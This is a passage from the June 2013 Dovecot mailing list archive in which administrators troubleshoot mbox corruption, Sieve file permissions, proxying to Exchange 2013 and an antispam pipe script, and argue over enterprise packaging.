(Disconnected by server): user=, method=PLAIN, rip=83.235.173.26, lip=83.235.66.65, session= However he's still able to log in again : Jun 19 11:11:36 pop01 dovecot: pop3-login: Login: user=, method=PLAIN, rip=85.74.231.10, lip=83.235.66.40, mpid=10094, secured, session= Jun 19 11:11:36 director3 dovecot: pop3-login: proxy(user at domain.gr): started proxying to 83.235.66.40:110: user=, method=PLAIN, rip=85.74.231.10, lip=83.235.66.63, session= Jun 19 11:11:51 pop01 dovecot: pop3(user at domain.gr): Disconnected: Logged out top=0/0, retr=0/0, del=0/237, size=75036938 Jun 19 11:11:51 director3 dovecot: pop3-login: proxy(user at domain.gr): disconnecting 85.74.231.10 (Disconnected by server): user=, method=PLAIN, rip=85.74.231.10, lip=83.235.66.63, session= A few minutes later he receives another mail which is delivered with no problem : Jun 19 11:30:39 corvus amavis[546]: (00546-22) Passed CLEAN, [91.190.168.40] [91.190.168.40] -> , Message-ID: <58175-bWFyaW5hQGJlcm5pZXItZWxpYWR lcy5ncg==@free.splio.com>, mail_id: J1P-0WpmQksJ, Hits: 1.412, size: 9025, queued_as: 02BA4AE00414, Tests: [DKIM_VALID=-0.1,DKIM_VERIFIED=-0.1,FREEMAIL_FROM=0.001,HTML_IMAGE_RATIO_04=0.61,INVALID_MSGID=1,URIBL_BLOCKED=0.001], autolearn=disabled, 1533 ms Jun 19 11:30:39 corvus smtp/smtpd[1283]: proxy-accept: END-OF-MESSAGE: 250 2.0.0 from MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as 02BA4AE00414; from= to= proto=ESMTP helo= Jun 19 11:30:39 pop01 dovecot: lmtp(4099, user at domain.gr): 77O4IHlGwVEDEAAAYg/qxw: msgid=58175-bWFyaW5hQGJlcm5pZXItZWxpYWRlcy5ncg==@free.splio.com: from=residence.suddenly at gmx.com size=9610 saved mail to INBOX Jun 19 11:30:39 corvus postfix/lmtp[1350]: 02BA4AE00414: to=, relay=lmtp.otenet.gr[62.103.147.209]:24, delay=0.12, delays=0.01/0/0/0.11, dsn=2.0.0, status=sent (250 2.0.0 77O4IHlGwVEDEAAAYg/qxw Saved) And then RIGHT after the successful delivery, the mbox somehow ends up corrupted with an FFrom in the beginning : Jun 19 11:31:27 pop01 dovecot: pop3-login: Login: user=, method=PLAIN, rip=83.235.173.26, lip=83.235.66.40, mpid=14630, secured, session= Jun 19 11:31:27 pop01 dovecot: pop3(user at domain.gr): Error: Syncing INBOX failed: Mailbox isn't a valid mbox file Jun 19 11:31:27 pop01 dovecot: pop3(user at domain.gr): Error: Couldn't init INBOX: Mailbox isn't a valid mbox file Jun 19 11:31:27 pop01 dovecot: pop3(user at domain.gr): Mailbox init failed top=0/0, retr=0/0, del=0/0, size=0 Jun 19 11:31:27 director5 dovecot: pop3-login: proxy(user at domain.gr): Login failed to 83.235.66.40:110: Mailbox isn't a valid mbox file Jun 19 11:31:27 pop01 dovecot: pop3-login: Login: user=, method=PLAIN, rip=83.235.173.26, lip=83.235.66.40, mpid=14642, secured, session= Jun 19 11:31:27 pop01 dovecot: pop3(user at domain.gr): Error: Syncing INBOX failed: Mailbox isn't a valid mbox file Jun 19 11:31:27 pop01 dovecot: pop3(user at domain.gr): Error: Couldn't init INBOX: Mailbox isn't a valid mbox file Jun 19 11:31:27 pop01 dovecot: pop3(user at domain.gr): Mailbox init failed top=0/0, retr=0/0, del=0/0, size=0 Jun 19 11:31:27 director5 dovecot: pop3-login: proxy(user at domain.gr): Login failed to 83.235.66.40:110: Mailbox isn't a valid mbox file Jun 19 11:31:27 director5 dovecot: pop3-login: Aborted login (proxy dest auth failed): user=, method=PLAIN, rip=83.235.173.26, lip=83.235.66.65, session= Hi folks, I am using dovecot 2.1.7 with the ManageSieve plugin which works great. Recently I set up Afterlogic webmail on my server (the community version) and it has a nice UI to manage the sieve settings. It uses port 2000 to communicate with dovecot via the ManageSieve plugin. Also, dovecot uses Maildirs to store the messages. The problem is that the permissions on the files that store the sieve rules are to strict. I am talking about the "sieve" directory and the .dovecot.sieve file. The sieve folder has a chmod 700 and the .dovecot.sieve is chmod 600. Both are owned by vmail:mail If I delete these two items, then the rules can be saved via the web interface. Then these files are created but for some reason the ManageSieve plugin can't modify them. Here is the output of dovecot -n: http://pastebin.com/4eqyBKCA Can you help me out on this? Thanks a lot! Zoltan From svante.signell at gmail.com Wed Jun 19 18:30:02 2013 From: svante.signell at gmail.com (Svante Signell) Date: Wed, 19 Jun 2013 17:30:02 +0200 Subject: [Dovecot] Patch for pigeonhole 0.4.0 avoiding PATH_MAX In-Reply-To: <1371551147.13314.2.camel@s1499.it.kth.se> References: <1371302696.30815.64.camel@G3620.my.own.domain> <51C00032.10003@rename-it.nl> <1371551147.13314.2.camel@s1499.it.kth.se> Message-ID: <1371655802.13314.10.camel@s1499.it.kth.se> On Tue, 2013-06-18 at 12:25 +0200, Svante Signell wrote: > On Tue, 2013-06-18 at 08:37 +0200, Stephan Bosch wrote: > > On 6/15/2013 3:24 PM, Svante Signell wrote: > > > Hi, > > > > > > I recently downloaded and built dovecot-2.2.2 and > > > dovecot-2.2-pigeonhole-0.4.0 on GNU/Linux and GNU/Hurd. The changes > > > needed will be sent to the Debian maintainer shortly. Latest Debian > > > release is 2.1.7-7 and dovecot-2.1-pigeonhole-0.3.1. When building > > > dovecot-2.2.2 there were no PATH_MAX problems on GNU/Hurd, thank you for > > > that. However, pigeonhole 0.4.0 had one remaining PATH_MAX construct. > > > The attached patch solves this problem. It it good enough to be accepted > > > upstream? (According to the description of t_malloc, free is not needed, > > > right?) > > > > Fixed: > > > > http://hg.rename-it.nl/dovecot-2.2-pigeonhole/rev/1b1a0c271383 > > Thanks a lot :) Are you planning to make a new (minor) release of pigeonhole soon, just to know what to submit in the bug report to the Debian maintainer? From d.parthey at metaways.de Wed Jun 19 19:40:12 2013 From: d.parthey at metaways.de (Daniel Parthey) Date: Wed, 19 Jun 2013 18:40:12 +0200 Subject: [Dovecot] Sieve file permission problem In-Reply-To: References: Message-ID: Please provide permission details of the affected directories and files and possibly error messages from dovecot logfile. Regards Daniel Zoltan Lippai schrieb: >Hi folks, > >I am using dovecot 2.1.7 with the ManageSieve plugin which works great. >Recently I set up Afterlogic webmail on my server (the community >version) and it has a nice UI to manage the sieve settings. It uses >port 2000 to communicate with dovecot via the ManageSieve plugin. Also, >dovecot uses Maildirs to store the messages. > >The problem is that the permissions on the files that store the sieve >rules are to strict. >I am talking about the "sieve" directory and the .dovecot.sieve file. >The sieve folder has a chmod 700 and the .dovecot.sieve is chmod 600. >Both are owned by vmail:mail > >If I delete these two items, then the rules can be saved via the web >interface. Then these files are created but for some reason the >ManageSieve plugin can't modify them. > >Here is the output of dovecot -n: >http://pastebin.com/4eqyBKCA > >Can you help me out on this? > >Thanks a lot! >Zoltan From ricardomachini at gmail.com Wed Jun 19 20:54:14 2013 From: ricardomachini at gmail.com (Ricardo Machini Barbosa) Date: Wed, 19 Jun 2013 14:54:14 -0300 Subject: [Dovecot] Dovecot proxy to Microsoft Exchange 2013 Message-ID: <51C1F046.9090607@gmail.com> Hello, I am trying to do a proxy with dovecot to IMAP backend server that are using Microsoft Exchange 2013. I already did this with Microsoft Exchange 2007 and Microsoft Exchange 2010 and it works perfectly! But with Microsoft Exchange 2013 I can not perform LOGIN. The error log message is: /imap-login: Error: proxy(user at domain.com.br): Login for exchange2013.domain.com.br:143 timed out in state=4 (after 30 secs, local=x.x.x.x:59640)/ My troubleshoot was: - tcpdump on dovecot server side: I can see the commands sent/received by Microsoft Exchange. But no the "OK LOGIN" response. /* OK The Microsoft Exchange IMAP4 service in xxxx is ready.// //C CAPABILITY// //L LOGIN "user at domain.com.br" "123456"// //* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN STARTTLS UIDPLUS CHILDREN IDLE NAMESPACE LITERAL+// //C OK CAPABILITY completed./ - tcpdump with telnet login on dovecot server side: Works fine. /* OK The Microsoft Exchange IMAP4 service in xxxx is ready.// //a login "user at domain.com.br" "123456"// //a OK LOGIN completed.// //a logout// //* BYE Microsoft Exchange Server 2013 IMAP4 server signing off.// //a OK LOGOUT completed./ - Log verbose on Microsoft Exchange 2013. Look like that Microsoft Exchange did not receive the login command. Someone already tried do this with Microsoft Exchange 2013 ? See bellow some information about my dovecot configuration: /# 2.2.2: dovecot.conf// //# OS: Linux 2.6.32-358.2.1.el6.centos.plus.x86_64 x86_64 CentOS release 6.4 (Final)// // //base_dir = /var/run/dovecot/// //disable_plaintext_auth = no// //listen = x.x.x.x// //mbox_write_locks = fcntl// //passdb {// // args = /etc/dovecot/dovecot-ldap.conf.ext// // driver = ldap// //}// // //protocols = imap pop3// //service imap-login {// // inet_listener imap {// // port = 143// // }// // inet_listener imaps {// // port = 993// // ssl = yes// // }// // process_min_avail = 4// // service_count = 0// // vsz_limit = 512 M// //}// //service pop3-login {// // inet_listener pop3 {// // port = 110// // }// // inet_listener pop3s {// // port = 995// // ssl = yes// // }// // process_min_avail = 4// // service_count = 0// // vsz_limit = 512 M// //}// //ssl_cert = Hello, I'm attempting to configure the Dovecot Antispam plug-in on Ubuntu 12.04 LTS with Dovecot 2.0.19. Everything seems to be in order with one considerable exception: when my pipe script (a simple Bash shell script) calls the dovecot-lda executable, absolutely nothing seems to result. If I copy/paste the exact same command into the terminal, the mail is delivered to the target mailbox, as expected. Here's my pipe script: http://pastebin.com/DBXAZqsN When I move a message from INBOX -> Junk, or from Junk -> INBOX, the pipe script is called, and here's the output: --------------------------------------------------------------- 31465-start (--debug --username=amavis --ham) Checking if the command-line input argument string (--debug --username=amavis --ham) contains the string "ham" or "spam" Mode is "HAM" Calling (as user vmail) '/usr/lib/dovecot/deliver -d "sa-training at example.com" -m "Training.HAM" -p "/tmp/sendmail-msg-31465.txt"' 31465-end --------------------------------------------------------------- But, for some reason, the call to "/usr/lib/dovecot/deliver" doesn't seem to do anything. If I copy the above output and paste it into the terminal: /usr/lib/dovecot/deliver -d "sa-training at example.com" -m "Training.HAM" -p "/tmp/sendmail-msg-31465.txt" Dovecot does indeed deliver the message. This works whether I execute the above command as "root" or "vmail". Why does this command have no effect when called from within the pipe script? Here is my "doveconf -n" output: # 2.0.19: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-042stab076.8 x86_64 Ubuntu 12.04.2 LTS auth_mechanisms = plain login disable_plaintext_auth = no listen = *,[::] log_timestamp = "%Y-%m-%d %H:%M:%S " mail_privileged_group = vmail passdb { args = /etc/dovecot/dovecot-sql.conf driver = sql } plugin { antispam_backend = pipe antispam_debug_target = syslog antispam_pipe_program = /usr/bin/sa-learn-pipe.sh antispam_pipe_program_args = --debug;--username=amavis antispam_pipe_program_notspam_arg = --ham antispam_pipe_program_spam_arg = --spam antispam_pipe_tmpdir = /tmp antispam_spam_pattern_ignorecase = SPAM;JUNK antispam_trash_pattern_ignorecase = trash;Deleted * antispam_verbose_debug = 1 quota = dict:user::file:/var/vmail/%d/%n/.quotausage quota_rule2 = Trash:storage=+100M quota_rule3 = Junk:ignore quota_warning = storage=95%% quota-warning 95 %u %d quota_warning2 = storage=80%% quota-warning 80 %u %d quota_warning3 = -storage=100%% quota-below below %u %d sieve = /var/vmail/%d/%n/.sieve } protocols = imap pop3 service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0660 user = postfix } unix_listener auth-userdb { group = vmail mode = 0600 user = vmail } user = root } service quota-below { executable = script /usr/local/bin/quota-below.sh user = vmail } service quota-warning { executable = script /usr/local/bin/quota-warning.sh user = vmail } ssl_cert = Dear all, I run dovecot and when i use 'ps ax |egrep dovecot' command , i get the following result: ////////////////// 9290 pts/3 S+ 0:00 tail -f /var/log/dovecot.err 9597 ? Ss 0:00 /opt/dovecot/sbin/dovecot 9598 ? S 0:00 dovecot/anvil 9599 ? S 0:00 dovecot/log 9601 ? S 0:00 dovecot/config 9606 pts/0 S+ 0:00 egrep --color=auto dovecot /////////////// I dont see any pop or imap process. --mohsen From tech at leding.net Thu Jun 20 02:24:32 2013 From: tech at leding.net (Antonio Leding) Date: Wed, 19 Jun 2013 16:24:32 -0700 Subject: [Dovecot] mail_max_userip_connections on a per user basis Message-ID: Hello, Can the above setting be applied on a per user account basis? I thought that maybe something like per account quotas might be a possible method but not sure. Thanks. From lhwebtek at aol.com Thu Jun 20 06:21:51 2013 From: lhwebtek at aol.com (Denny Jones) Date: Wed, 19 Jun 2013 23:21:51 -0400 (EDT) Subject: [Dovecot] Sieve Plugin Setup Message-ID: <8D03B7C70B1E5CB-1378-2D92D@webmail-m274.sysops.aol.com> I've got an existing setup that I want to add Sieve filtering to. I'm on QmailToaster: qmailadmin-toaster-1.2.16-1.4.0 I using Dovecot version 2.0.11 I'm looking for a good tutorial for installing Sieve Rules functionality on an existing system. Anybody know of one? Anybody else done this? Do I just install the latest Dovecot-sieve plugin release with wget, etc? What kind of configuration can I expect to have to go through. Do I have to reconfigure Dovecot to work in conjunction with the Sieve plugin? I'm hoping to find someone else has done this that can help me navigate the waters so-to-speak. Thanks in advance, Denny From bob at computerisms.ca Thu Jun 20 07:14:32 2013 From: bob at computerisms.ca (Bob Miller) Date: Wed, 19 Jun 2013 21:14:32 -0700 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C1FDFE.8010506@indietorrent.org> References: <51C1FDFE.8010506@indietorrent.org> Message-ID: <1371701672.2588.50.camel@worklian> Hi Ben, I checked over your script, and I don't see the problem either. You already checked everything that comes to my mind. Maybe using something like set -e to try and get some output from the script? -- Computerisms Bob Miller 867-334-7117 / 867-633-3760 http://computerisms.ca On Wed, 2013-06-19 at 14:52 -0400, Ben Johnson wrote: > Hello, > > I'm attempting to configure the Dovecot Antispam plug-in on Ubuntu 12.04 > LTS with Dovecot 2.0.19. > > Everything seems to be in order with one considerable exception: when my > pipe script (a simple Bash shell script) calls the dovecot-lda > executable, absolutely nothing seems to result. > > If I copy/paste the exact same command into the terminal, the mail is > delivered to the target mailbox, as expected. > > Here's my pipe script: http://pastebin.com/DBXAZqsN > > When I move a message from INBOX -> Junk, or from Junk -> INBOX, the > pipe script is called, and here's the output: > > --------------------------------------------------------------- > 31465-start (--debug --username=amavis --ham) > Checking if the command-line input argument string (--debug > --username=amavis --ham) contains the string "ham" or "spam" > Mode is "HAM" > Calling (as user vmail) '/usr/lib/dovecot/deliver -d > "sa-training at example.com" -m "Training.HAM" -p > "/tmp/sendmail-msg-31465.txt"' > 31465-end > --------------------------------------------------------------- > > But, for some reason, the call to "/usr/lib/dovecot/deliver" doesn't > seem to do anything. > > If I copy the above output and paste it into the terminal: > > /usr/lib/dovecot/deliver -d "sa-training at example.com" -m "Training.HAM" > -p "/tmp/sendmail-msg-31465.txt" > > Dovecot does indeed deliver the message. This works whether I execute > the above command as "root" or "vmail". > > Why does this command have no effect when called from within the pipe > script? > > Here is my "doveconf -n" output: > > # 2.0.19: /etc/dovecot/dovecot.conf > # OS: Linux 2.6.32-042stab076.8 x86_64 Ubuntu 12.04.2 LTS > auth_mechanisms = plain login > disable_plaintext_auth = no > listen = *,[::] > log_timestamp = "%Y-%m-%d %H:%M:%S " > mail_privileged_group = vmail > passdb { > args = /etc/dovecot/dovecot-sql.conf > driver = sql > } > plugin { > antispam_backend = pipe > antispam_debug_target = syslog > antispam_pipe_program = /usr/bin/sa-learn-pipe.sh > antispam_pipe_program_args = --debug;--username=amavis > antispam_pipe_program_notspam_arg = --ham > antispam_pipe_program_spam_arg = --spam > antispam_pipe_tmpdir = /tmp > antispam_spam_pattern_ignorecase = SPAM;JUNK > antispam_trash_pattern_ignorecase = trash;Deleted * > antispam_verbose_debug = 1 > quota = dict:user::file:/var/vmail/%d/%n/.quotausage > quota_rule2 = Trash:storage=+100M > quota_rule3 = Junk:ignore > quota_warning = storage=95%% quota-warning 95 %u %d > quota_warning2 = storage=80%% quota-warning 80 %u %d > quota_warning3 = -storage=100%% quota-below below %u %d > sieve = /var/vmail/%d/%n/.sieve > } > protocols = imap pop3 > service auth { > unix_listener /var/spool/postfix/private/auth { > group = postfix > mode = 0660 > user = postfix > } > unix_listener auth-userdb { > group = vmail > mode = 0600 > user = vmail > } > user = root > } > service quota-below { > executable = script /usr/local/bin/quota-below.sh > user = vmail > } > service quota-warning { > executable = script /usr/local/bin/quota-warning.sh > user = vmail > } > ssl_cert = ssl_key = userdb { > args = /etc/dovecot/dovecot-sql.conf > driver = sql > } > protocol imap { > mail_plugins = quota imap_quota antispam > } > protocol pop3 { > mail_plugins = quota > pop3_uidl_format = %08Xu%08Xv > } > protocol lda { > info_log_path = /var/log/dovecot-lda.log > log_path = /var/log/dovecot-lda-errors.log > mail_plugins = sieve quota > } > > > Thank you, > > -Ben From vincent_graphiste at hotmail.com Thu Jun 20 05:25:02 2013 From: vincent_graphiste at hotmail.com (vincent truc) Date: Thu, 20 Jun 2013 02:25:02 +0000 Subject: [Dovecot] doveadm move syntax Message-ID: Hello I want to forward an email to user1 at domain.com box to the box user2 at domain.com For this I try to use 'doveadm move', but I'm having problems with the syntax. Could you give me an example please? thanks From skdovecot at smail.inf.fh-brs.de Thu Jun 20 10:51:08 2013 From: skdovecot at smail.inf.fh-brs.de (Steffen Kaiser) Date: Thu, 20 Jun 2013 09:51:08 +0200 (CEST) Subject: [Dovecot] pop3 and imap don't run In-Reply-To: <1371678779.17311.10.camel@debian> References: <1371678779.17311.10.camel@debian> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Thu, 20 Jun 2013, Mohsen Pahlevanzadeh wrote: > I run dovecot and when i use > 'ps ax |egrep dovecot' command , i get the following result: what about ps ax|grep imap ? what about lsof -i :143 or netstat -an | grep 143 ? - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBUcK0bF3r2wJMiz2NAQL1cQf/T08fwL+kmijkXpq3zwyG3T0ngcSCMg4h Se3ZsI60r5hxKnbkZ7hxDW0JbUSw1Saw4Ivn57g+2OLGgBSC9m/+Sz4f3gv/Jn9t IR3Z/xqkSldFm4hIKq8xhV9M6QlnB1FzXdZjHXm47l1pzttUzSLf/DL/b21WBVeB SaTa2xUDj0nlhLK5zmPGKeBwm6zLEsiiBcT2k5DOFCY5mlpIjnZEmpracEBhIKou rMYO/1bb9HN/DUhgotcqa/P52X7fQFy+rWUnbGIgztYdykxPSOc/2C6USAEhjJeD d7g8e4uhvbPgoknIkHecAoe6XNL73amFAObangeTxt2mUUKf+OBeoA== =KCNL -----END PGP SIGNATURE----- From cryptodan at gmail.com Thu Jun 20 10:52:40 2013 From: cryptodan at gmail.com (Daniel Reinhardt) Date: Thu, 20 Jun 2013 03:52:40 -0400 Subject: [Dovecot] pop3 and imap don't run In-Reply-To: References: <1371678779.17311.10.camel@debian> Message-ID: Or even a better command: netstat | grep pop3 netstat | grep imap Will tell you if the ports are in listening status. On Thu, Jun 20, 2013 at 3:51 AM, Steffen Kaiser < skdovecot at smail.inf.fh-brs.de> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Thu, 20 Jun 2013, Mohsen Pahlevanzadeh wrote: > > I run dovecot and when i use >> 'ps ax |egrep dovecot' command , i get the following result: >> > > what about ps ax|grep imap ? > > what about lsof -i :143 or netstat -an | grep 143 ? > > - -- Steffen Kaiser > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.11 (GNU/Linux) > > iQEVAwUBUcK0bF3r2wJMiz2NAQL1cQ**f/T08fwL+**kmijkXpq3zwyG3T0ngcSCMg4h > Se3ZsI60r5hxKnbkZ7hxDW0JbUSw1S**aw4Ivn57g+2OLGgBSC9m/+Sz4f3gv/**Jn9t > IR3Z/**xqkSldFm4hIKq8xhV9M6QlnB1FzXdZ**jHXm47l1pzttUzSLf/DL/b21WBVeB > SaTa2xUDj0nlhLK5zmPGKeBwm6zLEs**iiBcT2k5DOFCY5mlpIjnZEmpracEBh**IKou > rMYO/1bb9HN/DUhgotcqa/**P52X7fQFy+rWUnbGIgztYdykxPSOc/**2C6USAEhjJeD > d7g8e4uhvbPgoknIkHecAoe6XNL73a**mFAObangeTxt2mUUKf+OBeoA== > =KCNL > -----END PGP SIGNATURE----- > -- Daniel Reinhardt cryptodan at cryptodan.net http://www.cryptodan.net 301-875-7018(c) 410-455-0488(h) From zoli at lippai.net Thu Jun 20 11:16:11 2013 From: zoli at lippai.net (Zoltan Lippai) Date: Thu, 20 Jun 2013 10:16:11 +0200 Subject: [Dovecot] Sieve file permission problem In-Reply-To: References: Message-ID: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> Thanks for the answer, I'm not sure what you mean by the additional permission details. Here is a quick example: /var/mail/domainname.hu/zolcsi chmod: 700, owner: vmail:mail After I set the initial sieve filters, the following file and directory gets created: /var/mail/domainname.hu/zolcsi/sieve (directory) chmod: 700, owner: vmail:mail /var/mail/domainname.hu/zolcsi/.dovecot.sieve (symlink to the sieve/sieve.sieve file) chmod: 600, owner: vmail:mail After these two are created then the webmail can't modify them unless I delete the files manually. I looked in the mail.log and mail.err files, but couldn't find anything related to this. Perhaps if I set the log level to a higher value? Or is it possible to connect via telnet to port 2000 and issue some commands to see the actual answers of the ManageSieve server? Best regards, Zoltan On 2013. June 19., Wednesday at 18:40, Daniel Parthey wrote: > Please provide permission details of the affected directories and files and possibly error messages from dovecot logfile. > > Regards > Daniel > > > > Zoltan Lippai schrieb: > > Hi folks, > > > > I am using dovecot 2.1.7 with the ManageSieve plugin which works great. Recently I set up Afterlogic webmail on my server (the community version) and it has a nice UI to manage the sieve settings. It uses port 2000 to communicate with dovecot via the ManageSieve plugin. Also, dovecot uses Maildirs to store the messages. > > > > The problem is that the permissions on the files that store the sieve rules are to strict. > > I am talking about the "sieve" directory and the .dovecot.sieve file. > > The sieve folder has a chmod 700 and the .dovecot.sieve is chmod 600. Both are owned by vmail:mail > > > > If I delete these two items, then the rules can be saved via the web interface. Then these files are created but for some reason the ManageSieve plugin can't modify them. > > > > Here is the output of dovecot -n: > > http://pastebin.com/4eqyBKCA > > > > Can you help me out on this? > > > > Thanks a lot! > > Zoltan > > > > From me at junc.eu Thu Jun 20 11:23:31 2013 From: me at junc.eu (Benny Pedersen) Date: Thu, 20 Jun 2013 10:23:31 +0200 Subject: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' In-Reply-To: <51C1AB7B.9030404@otenet.gr> References: <51C1AB7B.9030404@otenet.gr> Message-ID: <46c911fa708ebb793f0726049b798051@junc.eu> Dimos Alevizos skrev den 2013-06-19 15:00: > protocol imap { > imap_client_workarounds = delay-newmail tb-extra-mailbox-sep > mail_max_userip_connections = 100 > mail_plugins = quota imap_quota quota notify mail_log > } quota listed 2 times -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Thu Jun 20 11:54:00 2013 From: me at junc.eu (Benny Pedersen) Date: Thu, 20 Jun 2013 10:54:00 +0200 Subject: [Dovecot] dovecot enterprise release In-Reply-To: <51C02912.8060502@merit.unu.edu> References: <51C02912.8060502@merit.unu.edu> Message-ID: <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> mourik jan SOGo skrev den 2013-06-18 11:32: > On the dovecot enterprise release pages, only debian 6 compatibility > is shown. Are there any plans to support wheezy? (as 7 is stable now, > and we are running it...) apt-get source dovecot -b will not work ?, if not then your enterprise is building on precompiled problems -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From heupink at merit.unu.edu Thu Jun 20 12:53:54 2013 From: heupink at merit.unu.edu (mourik jan heupink) Date: Thu, 20 Jun 2013 11:53:54 +0200 Subject: [Dovecot] dovecot enterprise release In-Reply-To: <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> Message-ID: <51C2D132.6080802@merit.unu.edu> On 6/20/2013 10:54, Benny Pedersen wrote: >> On the dovecot enterprise release pages, only debian 6 compatibility >> is shown. Are there any plans to support wheezy? (as 7 is stable now, >> and we are running it...) > > apt-get source dovecot -b > > will not work ?, if not then your enterprise is building on precompiled > problems I'm not sure I understand..? From me at junc.eu Thu Jun 20 13:13:05 2013 From: me at junc.eu (Benny Pedersen) Date: Thu, 20 Jun 2013 12:13:05 +0200 Subject: [Dovecot] dovecot enterprise release In-Reply-To: <51C2D132.6080802@merit.unu.edu> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> Message-ID: <3de42c15e8eeec30cfe7263a609c6187@junc.eu> mourik jan heupink skrev den 2013-06-20 11:53: > I'm not sure I understand..? dovecot is opensource, so why depend on someone that will not package it for enterprise ? get the tarballs. create a deb package. install, be happy -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From heupink at merit.unu.edu Thu Jun 20 13:17:57 2013 From: heupink at merit.unu.edu (mourik jan heupink) Date: Thu, 20 Jun 2013 12:17:57 +0200 Subject: [Dovecot] dovecot enterprise release In-Reply-To: <3de42c15e8eeec30cfe7263a609c6187@junc.eu> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> <3de42c15e8eeec30cfe7263a609c6187@junc.eu> Message-ID: <51C2D6D5.6010904@merit.unu.edu> > dovecot is opensource, so why depend on someone that will not package it > for enterprise ? > > get the tarballs. create a deb package. install, be happy > Ah right. :-) But the advantage of using the http://www.dovecot.fi/ 'enterprise dovecot' would be that they provide up-to-date versions of dovecot. And currently we're running debian wheezy with it's default dovecot, version 2.1.7. MJ From me at junc.eu Thu Jun 20 13:25:35 2013 From: me at junc.eu (Benny Pedersen) Date: Thu, 20 Jun 2013 12:25:35 +0200 Subject: [Dovecot] dovecot enterprise release In-Reply-To: <51C2D6D5.6010904@merit.unu.edu> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> <3de42c15e8eeec30cfe7263a609c6187@junc.eu> <51C2D6D5.6010904@merit.unu.edu> Message-ID: <7423c9950b7deac187962aa26f58bfbe@junc.eu> mourik jan heupink skrev den 2013-06-20 12:17: > Ah right. :-) +1 > But the advantage of using the http://www.dovecot.fi/ 'enterprise > dovecot' would be that they provide up-to-date versions of dovecot. is there code changes in dovecot for enterprise ?, does it need a patch ? do you really belive Timo take his dev time to test on enterprise ? its waste of time > And currently we're running debian wheezy with it's default dovecot, > version 2.1.7. all that counts is glibc/gcc, and the source tarballs, the rest is up to YOU -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From treanorv at gmail.com Thu Jun 20 13:31:55 2013 From: treanorv at gmail.com (treanorv) Date: Thu, 20 Jun 2013 03:31:55 -0700 (PDT) Subject: [Dovecot] HowTo / VirtualUserFlatFilesPostfix Message-ID: <1371724314962-42887.post@n4.nabble.com> The following is an excerpt from the HOWTO mentioned Per-domain authentication and configuration structure /var/vmail dr-x------ 3 doveauth dovecot 4096 2010-03-17 19:09 auth.d |--> domain.tld Can anybody decypher the "|--> domain.tld" part please. Regards, treanorv -- View this message in context: http://dovecot.2317879.n4.nabble.com/HowTo-VirtualUserFlatFilesPostfix-tp42887.html Sent from the Dovecot mailing list archive at Nabble.com. From h.reindl at thelounge.net Thu Jun 20 15:41:22 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Thu, 20 Jun 2013 14:41:22 +0200 Subject: [Dovecot] dovecot enterprise release (benny stop trolling) In-Reply-To: <7423c9950b7deac187962aa26f58bfbe@junc.eu> References: <51C02912.8060502@merit.unu.edu> <95a0d741debe504b6ec1ae7a72bfc53d@junc.eu> <51C2D132.6080802@merit.unu.edu> <3de42c15e8eeec30cfe7263a609c6187@junc.eu> <51C2D6D5.6010904@merit.unu.edu> <7423c9950b7deac187962aa26f58bfbe@junc.eu> Message-ID: <51C2F872.4070902@thelounge.net> > Am 20.06.2013 12:25, schrieb Benny Pedersen: > is there code changes in dovecot for enterprise ?, does it need a patch ? > do you really belive Timo take his dev time to test on enterprise ? > its waste of time > > Am 20.06.2013 10:54, schrieb Benny Pedersen:> mourik jan SOGo skrev den 2013-06-18 11:32: > apt-get source dovecot -b > will not work ?, if not then your enterprise is building on precompiled problems benny stop your foolish trolling and no idea what "enterprise" means you have little to zero technical knowledge but your mouth wide open examples why benny is only a clueless troll? try to explain the postfix-developer how postfix works is ridiculous >> wietse at porcupine.org skrev den 2013-06-15 16:13: >> The server does not announce or accept AUTH, therefore AUTH it is disabled > Benny: > auth does not need starttls, if auth is not anounced then auth is disabled _______________________________________________________ http://news.gmane.org/gmane.mail.postfix.user/cutoff=237641 > postfix have both auth and starttls, starttls is just for clients to > use ssl/tls on port 25 STARTTLS has *nothing* to with the port > email clients will not use starttls in 2013, > since submission is the right thing anyway *foolish idiot* - clients will use STARTTLS *on* submission in 2013 which is *nothing else* than smptd on Port 587 and usually requires auth and if you have zero to nothing of a clue *shut up* >> wietse at porcupine.org skrev den 2013-06-15 16:13: >> The server does not announce or accept AUTH, therefore AUTH it is disabled > auth does not need starttls, if auth is not anounced then auth is disabled *foolish idiot* with "smtpd_tls_auth_only" it *is not* announced *until* the TLS handshake between server and client is done -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From mohsen at pahlevanzadeh.org Thu Jun 20 16:04:37 2013 From: mohsen at pahlevanzadeh.org (Mohsen Pahlevanzadeh) Date: Thu, 20 Jun 2013 17:34:37 +0430 Subject: [Dovecot] MySQL tables and official documenttation Message-ID: <1371733477.25411.17.camel@debian> Dear 